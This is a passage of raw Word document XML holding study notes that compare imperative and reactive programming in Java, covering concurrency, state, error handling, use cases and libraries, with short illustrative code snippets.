    <w:p w14:paraId="27E7EC00"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Example (Imperative)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07559372"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Imperative code to fetch and process user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79062EEA"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String data = fetchData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42B12E"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String processedData = processData(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02941A64"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displayData(processedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5185E"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Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52447DCE"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Reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is centered around the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data changes. It focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> streams of data and how to react to changes in that data (observing and responding to events over time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B2663"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It is typically used in scenarios where there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple data sources or events</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> happening in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C775C"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Execution is asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (operations don't block the main thread; they work in the background and notify when done).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BE4A1"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Example (Reactive)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071ED706"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Reactive programming with RxJava or Project Reactor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BAF30"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Mono.just(fetchData())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC8C25"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map(this::processData)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C93AC4"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doOnTerminate(() -&gt; displayData(processedData))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE02415"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subscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D4F9EA" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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1E16F34F">
          <v:rect id="_x0000_i2264" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84805E" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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2. Concurrency and Asynchrony</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D6174"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D067AC"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Typically </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712604BA"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Operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—the program execution waits for one operation to finish before starting the next one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A904C34"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Difficult to scale for handling large numbers of concurrent operations or multiple I/O-bound tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC851D0"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Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF77A1E"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Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014BDEB"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It works with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streams of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are processed asynchronously. Instead of blocking on each operation, the system can respond to other tasks while waiting for some operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6C539"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Better suited for scenarios involving </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as web servers or UI updates in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42890847" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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180D0A6">
          <v:rect id="_x0000_i2265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F6D47" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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3. State Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFFC55"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE023EB"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In imperative code, the state is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutated</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly. The programmer manages how the state is changed at each step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CEBC73"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Example: Variables are modified in-place, and operations are executed one by one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36204598"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Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AAC71"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The state is often modeled as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flows of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Data can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observed</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and transformations or side effects can be applied </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactively</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when changes occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5624D3"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The state is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data does not change in-place, but rather a new stream or event is emitted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF67DA" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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5D15DEC">
          <v:rect id="_x0000_i2266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFEEAF" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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4. Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73049D44"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131236E9"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Errors are handled by traditional mechanisms such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are thrown and caught by the programmer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD15034"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Typically synchronous handling of errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEA046"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Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77577EE9"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Errors are handled as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>part of the stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data. You can handle errors using specialized operators (like onErrorResume, onErrorReturn in Project Reactor, or RxJava).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC968B"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Error handling is </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing non-blocking recovery from errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621853E5" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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C0D1D0B">
          <v:rect id="_x0000_i2267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A576CB4" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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5. Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F22089"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D71E3A"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Good for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simple, sequential tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF9DF0"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Works well when you can process data sequentially and don't have a need for handling multiple events concurrently (e.g., simple algorithms, command-line programs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404AFE98"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Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815D11B"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Excellent for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and systems that need to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., web applications, real-time analytics, UI updates, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803C204"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Best suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where performance and responsiveness are important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6336D8AF" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="00000000" w:rsidP="00BF46D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202802">
          <v:rect id="_x0000_i2268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23AB7B" w14:textId="77777777" w:rsidR="005164BC" w:rsidRPr="00BF46DF" w:rsidRDefault="005164BC"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6. Libraries and Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55767BD4"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Imperative Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D794E4E"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Java's </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> paradigms (loops, conditionals).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BDDB74"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Libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CompletableFuture</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for some asynchronous execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B98D82B"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Reactive Programming:</w:t>
      </w:r>
